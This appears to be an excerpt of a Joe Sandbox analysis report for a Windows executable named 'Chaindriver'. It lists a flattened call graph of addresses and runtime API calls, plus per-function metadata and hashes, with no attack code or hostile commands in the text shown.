7ff720b4e7a7 27727->27728 27732 7ff720b3b674 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27727->27732 27730 7ff720b4e7c1 SetThreadExecutionState 27728->27730 27733 7ff720b3b674 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27728->27733 27732->27728 27733->27730 27735 7ff720b36a96 _snwprintf 27734->27735 27736 7ff720b36ae4 27735->27736 27737 7ff720b36ac4 27735->27737 27739 7ff720b36d4d 27736->27739 27742 7ff720b36b0f 27736->27742 27817 7ff720b328a4 82 API calls 2 library calls 27737->27817 27851 7ff720b328a4 82 API calls 2 library calls 27739->27851 27741 7ff720b36ad0 27743 7ff720b622a0 _handle_error 8 API calls 27741->27743 27742->27741 27779 7ff720b51f14 27742->27779 27744 7ff720b3394b 27743->27744 27744->27702 27744->27725 27766 7ff720b32794 27744->27766 27747 7ff720b36b85 27748 7ff720b36c2a 27747->27748 27765 7ff720b36b7b 27747->27765 27823 7ff720b48928 27747->27823 27788 7ff720b44720 27748->27788 27749 7ff720b36b6e 27818 7ff720b328a4 82 API calls 2 library calls 27749->27818 27750 7ff720b36b80 27750->27747 27819 7ff720b340b0 27750->27819 27756 7ff720b36c52 27757 7ff720b36cc7 27756->27757 27758 7ff720b36cd1 27756->27758 27792 7ff720b4174c 27757->27792 27829 7ff720b51ea0 27758->27829 27761 7ff720b36ccf 27849 7ff720b446c0 8 API calls _handle_error 27761->27849 27763 7ff720b36cfd 27763->27765 27850 7ff720b3433c 82 API calls 2 library calls 27763->27850 27807 7ff720b517f0 27765->27807 27767 7ff720b3289b 27766->27767 27771 7ff720b327d1 27766->27771 27930 7ff720b32018 33 API calls std::_Xinvalid_argument 27767->27930 27768 7ff720b327ed __std_swap_ranges_trivially_swappable 27929 7ff720b33bc0 31 API calls _invalid_parameter_noinfo_noreturn 27768->27929 27771->27768 27772 7ff720b62150 33 API calls 27771->27772 27772->27768 27774 7ff720b32888 27774->27702 27775->27725 27776->27716 27777->27718 27778->27725 27780 7ff720b51f45 std::bad_alloc::bad_alloc 27779->27780 27781 7ff720b51fd6 std::bad_alloc::bad_alloc 27779->27781 27783 7ff720b63ff8 Concurrency::cancel_current_task 2 API calls 27780->27783 27784 7ff720b51f8f std::bad_alloc::bad_alloc 27780->27784 27785 7ff720b36b59 27780->27785 27782 7ff720b63ff8 Concurrency::cancel_current_task 2 API calls 27781->27782 27782->27780 27783->27784 27784->27785 27786 7ff720b63ff8 Concurrency::cancel_current_task 2 API calls 27784->27786 27785->27747 27785->27749 27785->27750 27787 7ff720b52029 27786->27787 27789 7ff720b44740 27788->27789 27791 7ff720b4474a 27788->27791 27790 7ff720b62150 33 API calls 27789->27790 27790->27791 27791->27756 27793 7ff720b41776 memcpy_s 27792->27793 27852 7ff720b48a08 27793->27852 27795 7ff720b417aa 27796 7ff720b417e8 27795->27796 27799 7ff720b48a08 146 API calls 27795->27799 27862 7ff720b48c0c 27795->27862 27797 7ff720b4180e 27796->27797 27800 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27796->27800 27797->27761 27799->27795 27808 7ff720b5180e 27807->27808 27810 7ff720b51821 27808->27810 27872 7ff720b4e8c4 27808->27872 27814 7ff720b51858 27810->27814 27868 7ff720b622ec 27810->27868 27812 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27813 7ff720b51a50 27812->27813 27816 7ff720b519b7 27814->27816 27879 7ff720b4a944 31 API calls _invalid_parameter_noinfo_noreturn 27814->27879 27816->27812 27817->27741 27818->27765 27820 7ff720b340dd 27819->27820 27822 7ff720b340d7 memcpy_s 27819->27822 27820->27822 27880 7ff720b34120 27820->27880 27822->27747 27824 7ff720b48988 27823->27824 27825 7ff720b48972 27823->27825 27886 7ff720b3a1a0 27824->27886 27826 7ff720b3a1a0 109 API calls 27825->27826 27828 7ff720b48980 27826->27828 27828->27748 27830 7ff720b51ea9 27829->27830 27831 7ff720b51edd 27830->27831 27832 7ff720b51ed5 27830->27832 27834 7ff720b51ec9 27830->27834 27831->27761 27920 7ff720b538e4 151 API calls 27832->27920 27899 7ff720b5202c 27834->27899 27836 7ff720b546b3 memcpy_s 27836->27836 27849->27763 27850->27765 27851->27741 27854 7ff720b48a51 memcpy_s 27852->27854 27855 7ff720b48b8d 27852->27855 27853 7ff720b48bda 27856 7ff720b4e784 SetThreadExecutionState RtlPcToFileHeader RaiseException 27853->27856 27854->27855 27858 7ff720b48bdf 27854->27858 27859 7ff720b560ac 137 API calls 27854->27859 27860 7ff720b44848 108 API calls 27854->27860 27861 7ff720b42890 104 API calls 27854->27861 27855->27853 27857 7ff720b3a174 8 API calls 27855->27857 27856->27858 27857->27853 27858->27795 27859->27854 27860->27854 27861->27854 27863 7ff720b48c4b 27862->27863 27866 7ff720b48c32 memcpy_s 27862->27866 27863->27866 27869 7ff720b6231f 27868->27869 27870 7ff720b62348 27869->27870 27871 7ff720b517f0 108 API calls 27869->27871 27870->27814 27871->27869 27873 7ff720b4ec58 103 API calls 27872->27873 27874 7ff720b4e8db ReleaseSemaphore 27873->27874 27875 7ff720b4e91f DeleteCriticalSection CloseHandle CloseHandle 27874->27875 27876 7ff720b4e900 27874->27876 27877 7ff720b4e9d8 101 API calls 27876->27877 27878 7ff720b4e90a CloseHandle 27877->27878 27878->27875 27878->27876 27879->27816 27883 7ff720b34149 27880->27883 27885 7ff720b34168 memcpy_s __std_swap_ranges_trivially_swappable 27880->27885 27881 7ff720b32018 33 API calls 27882 7ff720b341eb 27881->27882 27884 7ff720b62150 33 API calls 27883->27884 27883->27885 27884->27885 27885->27881 27887 7ff720b3a200 27886->27887 27898 7ff720b3a290 27886->27898 27889 7ff720b4b8d0 102 API calls 27887->27889 27887->27898 27888 7ff720b622a0 _handle_error 8 API calls 27890 7ff720b3a2e0 27888->27890 27891 7ff720b3a226 27889->27891 27890->27828 27892 7ff720b50ee8 WideCharToMultiByte 27891->27892 27893 7ff720b3a248 27892->27893 27894 7ff720b3a292 27893->27894 27895 7ff720b3a256 27893->27895 27896 7ff720b3a2fc 105 API calls 27894->27896 27897 7ff720b3a664 109 API calls 27895->27897 27895->27898 27896->27898 27897->27898 27898->27888 27901 7ff720b52048 memcpy_s 27899->27901 27900 7ff720b5213a 27900->27836 27901->27900 27902 7ff720b3b76c 82 API calls 27901->27902 27902->27901 27920->27831 27929->27774 27932 7ff720b48852 27931->27932 27933 7ff720b48842 27931->27933 27932->27437 27938 7ff720b423b0 27933->27938 27936 7ff720b622a0 _handle_error 8 API calls 27935->27936 27937 7ff720b3f7ec 27936->27937 27937->27338 27937->27440 27939 7ff720b423cf 27938->27939 27942 7ff720b42a60 101 API calls 27939->27942 27940 7ff720b423e8 27943 7ff720b42b70 101 API calls 27940->27943 27941 7ff720b423f8 27941->27932 27942->27940 27943->27941 27944->27451 27946 7ff720b35e6f 27945->27946 28009 7ff720b485b0 27946->28009 27948 7ff720b36134 28019 7ff720b36fcc 82 API calls 27948->28019 27950 7ff720b369af 27951 7ff720b622a0 _handle_error 8 API calls 27950->27951 27954 7ff720b369c3 27951->27954 27952 7ff720b369e4 27957 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27952->27957 27953 7ff720b36973 28032 7ff720b3466c 82 API calls 27953->28032 27954->27463 27956 7ff720b3612e 27956->27948 27956->27953 27959 7ff720b485b0 104 API calls 27956->27959 27958 7ff720b369e9 27957->27958 27960 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27958->27960 27961 7ff720b361a4 27959->27961 27962 7ff720b369ef 27960->27962 27961->27948 27965 7ff720b361ac 27961->27965 27963 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27962->27963 27964 7ff720b369f5 27963->27964 27966 7ff720b3623f 27965->27966 28020 7ff720b3466c 82 API calls 27965->28020 27966->27953 27968 7ff720b36266 27966->27968 27971 7ff720b368b7 27968->27971 27972 7ff720b362ce 27968->27972 27974 7ff720b44cc4 31 API calls 27971->27974 27973 7ff720b36481 27972->27973 27976 7ff720b362e0 27972->27976 27993 7ff720b3613c 27976->27993 27993->27950 27993->27952 27993->27962 28007->27463 28010 7ff720b4865a 28009->28010 28011 7ff720b485d4 28009->28011 28012 7ff720b4863c 28010->28012 28014 7ff720b340b0 33 API calls 28010->28014 28011->28012 28013 7ff720b340b0 33 API calls 28011->28013 28012->27956 28015 7ff720b4860d 28013->28015 28016 7ff720b48673 28014->28016 28033 7ff720b3a174 28015->28033 28018 7ff720b42890 104 API calls 28016->28018 28018->28012 28019->27993 28034 7ff720b3a185 28033->28034 28035 7ff720b3a19a 28034->28035 28037 7ff720b4aed4 8 API calls 2 library calls 28034->28037 28035->28012 28037->28035 28045 7ff720b39be7 28038->28045 28039 7ff720b39c1b 28040 7ff720b622a0 _handle_error 8 API calls 28039->28040 28041 7ff720b39c9d 28040->28041 28041->27480 28044 7ff720b31fa0 31 API calls 28044->28039 28045->28039 28046 7ff720b39cae 28045->28046 28050 7ff720b39c83 28045->28050 28182 7ff720b45254 34 API calls 3 library calls 28045->28182 28183 7ff720b4dadc 33 API calls 28045->28183 28047 7ff720b39cbf 28046->28047 28184 7ff720b4d9c4 CompareStringW 28046->28184 28049 7ff720b320b0 33 API calls 28047->28049 28047->28050 28049->28050 28050->28044 28064 7ff720b45efa 28051->28064 28052 7ff720b4618e 28185 7ff720b3704c 47 API calls memcpy_s 28052->28185 28053 7ff720b622a0 _handle_error 8 API calls 28054 7ff720b3fb39 28053->28054 28054->27484 28138 7ff720b47c54 47 API calls 2 library calls 28054->28138 28056 7ff720b3129c 33 API calls 28058 7ff720b460e9 28056->28058 28057 7ff720b46194 28059 7ff720b31fa0 31 API calls 28058->28059 28061 7ff720b460fb memcpy_s 28058->28061 28059->28061 28060 7ff720b4615b 28060->28053 28061->28060 28062 7ff720b46189 28061->28062 28063 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 28062->28063 28063->28052 28064->28052 28064->28056 28064->28060 28137->27474 28138->27485 28180->27502 28181->27502 28182->28045 28183->28045 28184->28047 28185->28057 28246->27647 28247->27652 28249 7ff720b4876f 28248->28249 28257 7ff720b4879f 28248->28257 28250 7ff720b622ec 108 API calls 28249->28250 28253 7ff720b4878a 28250->28253 28251 7ff720b622ec 108 API calls 28254 7ff720b487d4 28251->28254 28256 7ff720b622ec 108 API calls 28253->28256 28258 7ff720b622ec 108 API calls 28254->28258 28255 7ff720b48805 28259 7ff720b445dc 108 API calls 28255->28259 28256->28257 28257->28251 28260 7ff720b487eb 28257->28260 28258->28260 28261 7ff720b48811 28259->28261 28263 7ff720b445dc 28260->28263 28262->27642 28264 7ff720b445f2 28263->28264 28266 7ff720b445fa 28263->28266 28265 7ff720b4e8c4 108 API calls 28264->28265 28265->28266 28266->28255 28267->26986 28268->26993 28269->26995 26286 7ff720b6beac 26293 7ff720b6bbb4 26286->26293 26298 7ff720b6d3c0 35 API calls 2 library calls 26293->26298 26295 7ff720b6bbbf 26299 7ff720b6cfe8 35 API calls abort 26295->26299 26298->26295 26353 7ff720b6d8cc 26354 7ff720b6d917 26353->26354 26358 7ff720b6d8db abort 26353->26358 26360 7ff720b6d61c 15 API calls memcpy_s 26354->26360 26356 7ff720b6d8fe HeapAlloc 26357 7ff720b6d915 26356->26357 26356->26358 26358->26354 26358->26356 26359 7ff720b6bb40 abort 2 API calls 26358->26359 26359->26358 26360->26357 25300 7ff720b60360 25301 7ff720b60417 25300->25301 25302 7ff720b6039f 25300->25302 25325 7ff720b4aaa0 25301->25325 25304 7ff720b4aaa0 48 API calls 25302->25304 25306 7ff720b603b3 25304->25306 25340 7ff720b4da14 25306->25340 25307 7ff720b4da14 48 API calls 25314 7ff720b603c2 memcpy_s 25307->25314 25310 7ff720b604c1 25337 7ff720b3250c 25310->25337 25312 7ff720b6054c 25315 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25312->25315 25313 7ff720b60546 25343 7ff720b67884 25313->25343 25314->25312 25314->25313 25332 7ff720b31fa0 25314->25332 25318 7ff720b60552 25315->25318 25326 7ff720b4aab3 25325->25326 25348 7ff720b49734 25326->25348 25329 7ff720b4ab18 LoadStringW 25330 7ff720b4ab46 25329->25330 25331 7ff720b4ab31 LoadStringW 25329->25331 25330->25307 25331->25330 25333 7ff720b31fdc 25332->25333 25334 7ff720b31fb3 25332->25334 25333->25310 25334->25333 25335 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25334->25335 25336 7ff720b32000 25335->25336 25338 7ff720b32516 SetDlgItemTextW 25337->25338 25339 7ff720b32513 25337->25339 25339->25338 25385 7ff720b4d7f0 25340->25385 25478 7ff720b677bc 31 API calls 2 library calls 25343->25478 25345 7ff720b6789d 25479 7ff720b678b4 16 API calls abort 25345->25479 25355 7ff720b495f8 25348->25355 25351 7ff720b49799 25365 7ff720b622a0 25351->25365 25356 7ff720b49652 25355->25356 25364 7ff720b496f0 25355->25364 25360 7ff720b49680 25356->25360 25378 7ff720b50ee8 WideCharToMultiByte 25356->25378 25358 7ff720b622a0 _handle_error 8 API calls 25361 7ff720b49724 25358->25361 25359 7ff720b496af 25381 7ff720b6a1f0 31 API calls 2 library calls 25359->25381 25360->25359 25380 7ff720b4aa48 45 API calls _snwprintf 25360->25380 25361->25351 25374 7ff720b497c0 25361->25374 25364->25358 25366 7ff720b622a9 25365->25366 25367 7ff720b497b2 25366->25367 25368 7ff720b624d0 IsProcessorFeaturePresent 25366->25368 25367->25329 25367->25330 25369 7ff720b624e8 25368->25369 25382 7ff720b626c4 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 25369->25382 25371 7ff720b624fb 25383 7ff720b62490 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25371->25383 25375 7ff720b49800 25374->25375 25377 7ff720b49829 25374->25377 25384 7ff720b6a1f0 31 API calls 2 library calls 25375->25384 25377->25351 25379 7ff720b50f2a 25378->25379 25379->25360 25380->25359 25381->25364 25382->25371 25384->25377 25401 7ff720b4d44c 25385->25401 25390 7ff720b4d8f0 25399 7ff720b4d91f 25390->25399 25443 7ff720b39d78 33 API calls 25390->25443 25391 7ff720b4d861 _snwprintf 25391->25390 25415 7ff720b69e70 25391->25415 25442 7ff720b39d78 33 API calls 25391->25442 25393 7ff720b4d993 25394 7ff720b622a0 _handle_error 8 API calls 25393->25394 25396 7ff720b4d9a7 25394->25396 25395 7ff720b4d9bb 25397 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25395->25397 25396->25314 25398 7ff720b4d9c0 25397->25398 25399->25393 25399->25395 25402 7ff720b4d5e1 25401->25402 25404 7ff720b4d47e 25401->25404 25405 7ff720b4cb3c 25402->25405 25403 7ff720b31744 33 API calls 25403->25404 25404->25402 25404->25403 25406 7ff720b4cb72 25405->25406 25413 7ff720b4cc3c 25405->25413 25407 7ff720b4cb82 25406->25407 25410 7ff720b4cbdc 25406->25410 25411 7ff720b4cc37 25406->25411 25407->25391 25410->25407 25444 7ff720b62150 25410->25444 25453 7ff720b31f80 33 API calls 3 library calls 25411->25453 25454 7ff720b32004 33 API calls std::_Xinvalid_argument 25413->25454 25416 7ff720b69ece 25415->25416 25417 7ff720b69eb6 25415->25417 25416->25417 25419 7ff720b69ed8 25416->25419 25466 7ff720b6d61c 15 API calls memcpy_s 25417->25466 25468 7ff720b67e70 35 API calls 2 library calls 25419->25468 25420 7ff720b69ebb 25467 7ff720b67864 31 API calls _invalid_parameter_noinfo_noreturn 25420->25467 25423 7ff720b622a0 _handle_error 8 API calls 25425 7ff720b6a08b 25423->25425 25424 7ff720b69ee9 memcpy_s 25469 7ff720b67df0 15 API calls memcpy_s 25424->25469 25425->25391 25427 7ff720b69f54 25470 7ff720b68278 46 API calls 3 library calls 25427->25470 25429 7ff720b69f5d 25430 7ff720b69f65 25429->25430 25431 7ff720b69f94 25429->25431 25471 7ff720b6d88c 25430->25471 25433 7ff720b69fec 25431->25433 25434 7ff720b69fa3 25431->25434 25435 7ff720b6a012 25431->25435 25436 7ff720b69f9a 25431->25436 25437 7ff720b6d88c __free_lconv_mon 15 API calls 25433->25437 25439 7ff720b6d88c __free_lconv_mon 15 API calls 25434->25439 25435->25433 25438 7ff720b6a01c 25435->25438 25436->25433 25436->25434 25441 7ff720b69ec6 25437->25441 25440 7ff720b6d88c __free_lconv_mon 15 API calls 25438->25440 25439->25441 25440->25441 25441->25423 25442->25391 25443->25399 25445 7ff720b6215b 25444->25445 25446 7ff720b62174 25445->25446 25448 7ff720b6217a 25445->25448 25455 7ff720b6bb40 25445->25455 25446->25407 25451 7ff720b62185 25448->25451 25458 7ff720b62efc RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25448->25458 25459 7ff720b31f80 33 API calls 3 library calls 25451->25459 25452 7ff720b6218b 25453->25413 25460 7ff720b6bb80 25455->25460 25458->25451 25459->25452 25465 7ff720b6f318 EnterCriticalSection 25460->25465 25466->25420 25467->25441 25468->25424 25469->25427 25470->25429 25472 7ff720b6d891 RtlFreeHeap 25471->25472 25474 7ff720b6d8c1 __free_lconv_mon 25471->25474 25473 7ff720b6d8ac 25472->25473 25472->25474 25477 7ff720b6d61c 15 API calls memcpy_s 25473->25477 25474->25441 25476 7ff720b6d8b1 GetLastError 25476->25474 25477->25476 25478->25345 26303 7ff720b62070 26304 7ff720b62086 _com_error::_com_error 26303->26304 26309 7ff720b63ff8 26304->26309 26306 7ff720b62097 26307 7ff720b61880 _com_raise_error 14 API calls 26306->26307 26308 7ff720b620e3 26307->26308 26310 7ff720b64017 26309->26310 26311 7ff720b64034 RtlPcToFileHeader 26309->26311 26310->26311 26312 7ff720b6404c 26311->26312 26313 7ff720b6405b RaiseException 26311->26313 26312->26313 26313->26306 26320 7ff720b6bd78 26321 7ff720b6bd9e GetModuleHandleW 26320->26321 26322 7ff720b6bde8 26320->26322 26321->26322 26329 7ff720b6bdab 26321->26329 26337 7ff720b6f318 EnterCriticalSection 26322->26337 26329->26322 26338 7ff720b6bf30 GetModuleHandleExW 26329->26338 26339 7ff720b6bf5a GetProcAddress 26338->26339 26340 7ff720b6bf81 26338->26340 26339->26340 26341 7ff720b6bf74 26339->26341 26342 7ff720b6bf8b FreeLibrary 26340->26342 26343 7ff720b6bf91 26340->26343 26341->26340 26342->26343 26343->26322 28270 7ff720b6114f 28271 7ff720b61082 28270->28271 28272 7ff720b61880 _com_raise_error 14 API calls 28271->28272 28272->28271

                                                    Executed Functions

                                                    Function 00007FF720B3F940 Relevance: 17.1, APIs: 8, Strings: 1, Instructions: 1396COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID: __tmp_reference_source_
                                                    • API String ID: 3668304517-685763994
                                                    • Opcode ID: 8210d87abdacc87ac5e9da30224aa90e187ed07e086d8e0259362a61d43f00e5
                                                    • Instruction ID: 46670f2d101dc4bf16691f7cacdafa07d2b7e68075847ee555ba4484a72e511a
                                                    • Opcode Fuzzy Hash: 8210d87abdacc87ac5e9da30224aa90e187ed07e086d8e0259362a61d43f00e5
                                                    • Instruction Fuzzy Hash: 52D28462A186C292EA74AB25DD543AEE761FB41780F904132DB9E13BA5CF3CF554CB30
                                                    Function 00007FF720B4B970 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2668 7ff720b4b970-7ff720b4b9a2 2669 7ff720b4b9a4-7ff720b4b9aa 2668->2669 2670 7ff720b4ba0f 2668->2670 2669->2670 2671 7ff720b4b9ac-7ff720b4b9c2 call 7ff720b4dd04 2669->2671 2672 7ff720b4ba16-7ff720b4ba23 2670->2672 2680 7ff720b4b9f8 2671->2680 2681 7ff720b4b9c4-7ff720b4b9f6 GetProcAddressForCaller GetProcAddress 2671->2681 2674 7ff720b4ba69-7ff720b4ba6c 2672->2674 2675 7ff720b4ba25-7ff720b4ba28 2672->2675 2677 7ff720b4ba6e-7ff720b4ba70 2674->2677 2678 7ff720b4ba86-7ff720b4ba8f GetCurrentProcessId 2674->2678 2675->2678 2679 7ff720b4ba2a-7ff720b4ba2f 2675->2679 2685 7ff720b4ba79-7ff720b4ba7b 2677->2685 2682 7ff720b4baa1-7ff720b4babb 2678->2682 2683 7ff720b4ba91-7ff720b4ba9f 2678->2683 2686 7ff720b4ba38-7ff720b4ba3a 2679->2686 2684 7ff720b4b9ff-7ff720b4ba0d 2680->2684 2681->2684 2683->2682 2683->2683 2684->2672 2685->2682 2687 7ff720b4ba7d-7ff720b4ba84 2685->2687 2686->2682 2688 7ff720b4ba3c 2686->2688 2689 7ff720b4ba43-7ff720b4ba67 call 7ff720b3b67c call 7ff720b3ba60 call 7ff720b3b674 2687->2689 2688->2689 2689->2682
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                    • API String ID: 1389829785-2207617598
                                                    • Opcode ID: 76993cb25b15c21bbb9ba85500eed42f79ef62b9df03f1df33b6944fdfd5394b
                                                    • Instruction ID: 2c2953a26ca9787959745b7b9e2ce0c5a7e3babcc7d1cafb7a387fca60ce0688
                                                    • Opcode Fuzzy Hash: 76993cb25b15c21bbb9ba85500eed42f79ef62b9df03f1df33b6944fdfd5394b
                                                    • Instruction Fuzzy Hash: C2316D24A4AA0791FA34AB19AC6453CA7B0EF48B90FC40535CA4F03BA4DE3CF6418F34
                                                    Function 00007FF720B59168 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                    • String ID: EDIT
                                                    • API String ID: 4243998846-3080729518
                                                    • Opcode ID: 3006384394de3d7d6335ffca3663b2ae555a506821308572bdb38291f1b12f27
                                                    • Instruction ID: e728a1c02fbcee42f03b9779e1ba20a4516885326d6895fd82a467f90807b8a0
                                                    • Opcode Fuzzy Hash: 3006384394de3d7d6335ffca3663b2ae555a506821308572bdb38291f1b12f27
                                                    • Instruction Fuzzy Hash: 26014F21A08A5791FA70AB21EC147AE9354EF99740FC40431C95F16765DE2CF6498E30
                                                    Function 00007FF720B60360 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                    • String ID:
                                                    • API String ID: 2912839123-0
                                                    • Opcode ID: dbe46ff790c20b89912a0fdaa554b5e2640218e7059209ab3c025edf3ca2331f
                                                    • Instruction ID: 94902fdbd857004d361672f0a593520b029bffd287078d2fca6676f30d186f65
                                                    • Opcode Fuzzy Hash: dbe46ff790c20b89912a0fdaa554b5e2640218e7059209ab3c025edf3ca2331f
                                                    • Instruction Fuzzy Hash: DC51A066F2465284FB20ABA5DC452AD6322EF44BA4F80063ADB1E17BD5DF6CF540CB30
                                                    Function 00007FF720B62CEC Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 1452418845-0
                                                    • Opcode ID: ac8e0d61ad9562805f3f0f4ceccdbb6567ef63bb883097c4bc40aa5993711c11
                                                    • Instruction ID: 6ac263aa281c580d21c6b830879b9241f7ccf1fbf4d80aa599390f379f5ba94c
                                                    • Opcode Fuzzy Hash: ac8e0d61ad9562805f3f0f4ceccdbb6567ef63bb883097c4bc40aa5993711c11
                                                    • Instruction Fuzzy Hash: BA313729E0990246FA74BB649C613BDA291EF40784FC4043CD90F4B7E3DE2DB9048E31
                                                    Function 00007FF720B422E0 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
